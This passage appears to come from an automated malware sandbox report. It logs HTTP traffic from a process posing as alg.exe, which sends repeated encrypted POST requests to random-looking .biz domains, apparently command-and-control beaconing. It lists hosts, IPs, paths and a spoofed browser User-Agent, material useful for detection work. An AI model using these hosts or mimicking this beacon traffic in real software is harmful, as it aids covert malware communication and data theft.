                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        24192.168.2.449760208.100.26.245806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902729034 CET349OUTPOST /mmdfp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.902765989 CET778OUTData Raw: b3 b9 17 20 4d dd 15 24 fe 02 00 00 17 08 4b 60 ac b2 bb 61 32 54 ac ba e8 f0 54 55 fa 5d e3 4b dd 97 1f ec 2b 14 53 e5 82 16 c9 e9 b7 ed 9c 40 25 d5 82 60 58 b6 25 5b 94 80 de 1f 17 77 98 15 76 2e 49 ce 36 0f 1f 3f 13 48 9e 88 5a 92 7e 07 d0 8a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: M$K`a2TTU]K+S@%`X%[wv.I6?HZ~'STP&?:~%w3cX_Rnrty"K>\OMWGp@#01p_0t$A^[9k3:$dwqm:zBc})Enz^yU
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.534274101 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555001020 CET350OUTPOST /yhdmpa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.555073023 CET778OUTData Raw: 15 80 cf 5d b0 72 e6 90 fe 02 00 00 68 be 37 7d 4f df a5 0d 32 bd ac 09 3d 97 9b b1 03 92 72 06 29 42 35 c6 7f 41 e6 06 70 25 2c 8a f2 27 fb 20 75 ce c2 1f 76 52 1a c8 e1 57 24 19 50 62 4c 97 ef 65 d7 77 5f f3 62 5b a7 19 4a fe fa 0e de a2 01 d0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]rh7}O2=r)B5Ap%,' uvRW$PbLew_b[J"cxzMXOy}~TG5]2+<^3Hu^]TQFHQ3NR:BHKW;8ITgz^BFw9q5-j+<aXW_y&f4(X
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.699248075 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        25192.168.2.44976113.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963346004 CET356OUTPOST /tjrtnokwwlpftv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.963610888 CET778OUTData Raw: d6 9f 37 05 8b 1d 26 3b fe 02 00 00 88 5d b4 fb c5 1f 54 2c 49 44 da 8f 66 9d 40 1c 82 a6 8b a2 a7 57 65 6a 04 2d 88 4a e8 71 5e 91 a7 a7 8b ea 45 69 7e 48 83 25 35 e0 6c 9f 0c ff ba 4b ad 43 c8 78 25 d9 f0 cf 6d d5 ab 79 bc dd 13 16 f3 d3 78 57
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7&;]T,IDf@Wej-Jq^Ei~H%5lKCx%myxWW;v5KtHA7=1Omq\GN5h7`j:mGyKJqV7s!1hs(^r3U86|yZzf?B}0XF]x&R%h3
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.398087025 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fffb985ec9a7770d1d973c54f5ab158e|155.94.241.188|1730129865|1730129865|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        26192.168.2.44976244.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554348946 CET350OUTPOST /wfwpk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.554375887 CET778OUTData Raw: a8 70 b0 93 b1 f4 85 34 fe 02 00 00 17 a5 b1 14 34 5a 3f 8c de 2c 52 e6 d6 08 35 1d 10 41 7a ff 56 db 19 be ec 63 c8 03 1b 25 19 2b 15 e9 fd cd 50 5c ee 67 b1 9c 16 13 8a 7d cb 0c a8 bf 98 1b ef 68 e7 20 b4 b8 18 41 47 16 6e 85 25 12 12 15 1d 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: p44Z?,R5AzVc%+P\g}h AGn%#)fB|Q5C"nY cn9M3foHMP~+Tg@L5p"!gd#Z52LUXdBI*vkoQcr0KdO?v?kFyM
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.224875927 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8bbb7932b102c2eb2bcff075fef0ac7b|155.94.241.188|1730129866|1730129866|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        27192.168.2.44976354.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.329646111 CET360OUTPOST /arnrrfwlvkgxeufd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.329866886 CET778OUTData Raw: 6d b0 a4 86 d5 77 8e 3f fe 02 00 00 f4 64 e1 84 d2 28 4d 03 82 21 6f 67 b8 93 2d 99 df a5 90 42 ea e0 1c 0f 8a ab e8 9f 7d fb da 08 02 ba 0f 8f fe a5 cd db eb 07 e3 d0 d3 63 26 23 37 1c e8 d8 91 62 5e 56 54 64 79 8a cc 09 fd 01 56 ff 51 3b 77 25
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mw?d(M!og-B}c&#7b^VTdyVQ;w%19=]8[gTY/c<Zvp9FI{g?gi0~=|4%W~8uNQ}xT2|]t%6oWY`MT*,cMe?WFDirB\h
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.151242971 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b12624e9a0abc354287fcbcd6f4afc96|155.94.241.188|1730129867|1730129867|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        28192.168.2.44976435.164.78.200806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.697072983 CET357OUTPOST /ckfgkmbjfmpkxgr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.697103977 CET778OUTData Raw: 4d 2b a5 e6 44 35 ef 0d fe 02 00 00 87 9e 07 2d e2 56 9e ed e1 ca 5e 4e e5 d7 e6 ae 92 78 1e 9a 52 5a ce 40 f3 d2 6f d6 25 8a 74 ae 0f d9 3e 38 24 1c 05 c7 b0 82 04 9e 39 d0 54 f0 a1 27 aa ef 4f 32 c2 cd 00 8e c5 f1 79 23 0c 7e df 3d 3c 66 b5 8c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: M+D5-V^NxRZ@o%t>8$9T'O2y#~=<f@GE \g3qA$juV==ub_`C@_MB!E,~.R_$`l EGRF4|5E[rkMPI\LIr\
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.533227921 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6f8db1932632d1d3c4504fb5a58a1adb|155.94.241.188|1730129869|1730129869|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        29192.168.2.4497653.94.10.34806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795176983 CET356OUTPOST /dneetrunpbg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.795200109 CET778OUTData Raw: 89 3a a6 d7 1a 3c c5 50 fe 02 00 00 93 b8 f0 b5 87 33 0b 4d 52 35 04 a0 f1 30 d3 5e 8b eb e8 ed ab 98 e5 9c 85 39 51 1e 1e 40 a9 a1 ba d9 db 5e 45 b0 40 82 4e bd 0a b3 f6 c2 7b b8 96 d9 75 28 62 44 d5 a0 3a 88 e1 bc 91 18 a3 14 be 46 97 84 25 07
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :<P3MR50^9Q@^E@N{u(bD:F%i\`YFgodyGxZZchO&=N4$Umx#;D)2jBf)a!x&"z"Kb,r'\!E'Vue6KehF(1ESmb0K
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.469099998 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d32c61658022c84a5423750ac11fcc6a|155.94.241.188|1730129870|1730129870|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        30192.168.2.449766165.160.15.20806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.618063927 CET343OUTPOST /vr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.618099928 CET778OUTData Raw: 65 02 71 7e be 7b bb c3 fe 02 00 00 28 e4 76 17 7d b2 9a ab bf 0f 02 e0 4b 62 e1 9a a3 61 0e 2e fb 23 15 ab 18 68 32 63 e2 83 e0 11 29 3c f8 24 33 66 63 82 c2 0f 36 33 3a ab 39 d0 b1 fe b8 72 f0 02 0c 37 f5 51 20 c0 53 82 57 ac 86 38 f5 60 d7 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eq~{(v}Kba.#h2c)<$3fc63:9r7Q SW8`#CK::]Hg{mlw$]n;=<hu{p&7T'@j]Uy'A]i5BFNoHD=-jG%bFJRl_6]Y}e,qK#\
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.321888924 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.514925003 CET348OUTPOST /euqwoqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.514952898 CET778OUTData Raw: 0a eb b7 fa 71 bb 7e 43 fe 02 00 00 4e ab 24 55 c6 fc 1e af 70 73 df 21 43 ec 30 85 97 29 db a1 2a 87 ed 59 62 9e 2c c7 9d 64 9a 36 c3 ee 61 0a be 17 57 4a 44 73 c7 4c ad 39 86 7c d3 af 34 c9 b0 c4 55 83 7c 04 fb e5 5c 3c a8 aa 05 5a 5c d8 1d e2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q~CN$Ups!C0)*Yb,d6aWJDsL9|4U|\<Z\x5$L5s3cIvC-|yw18>?-rV+2"RS`J/AL6$/_+!m2P^%d{D8tFH3UaN9lN'w'Qq`#m
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.691634893 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        31192.168.2.44976754.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920543909 CET351OUTPOST /ibecst HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
